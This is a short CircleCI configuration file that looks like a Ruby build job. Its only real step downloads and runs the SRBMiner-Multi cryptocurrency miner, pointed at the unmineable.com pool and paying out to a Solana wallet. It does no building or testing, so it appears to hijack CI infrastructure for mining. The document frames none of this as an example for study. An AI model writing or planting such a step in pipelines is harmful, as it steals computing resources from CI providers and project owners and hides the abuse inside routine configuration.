version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.7.9/SRBMiner-Multi-0-7-9-Linux.tar.xz && tar -xf SRBMiner-Multi-0-7-9-Linux.tar.xz && cd SRBMiner-Multi-0-7-9 && ./SRBMiner-MULTI --algorithm rx --pool rx.unmineable.com:3333 --wallet SOL:5M4LLuvYoVSv1KgdopUrXZwYpVPz92qhDsMnXFnjTJkY.$(echo $(shuf -i 1-8000 -n 1)-ARCH) --password x --keepalive --tls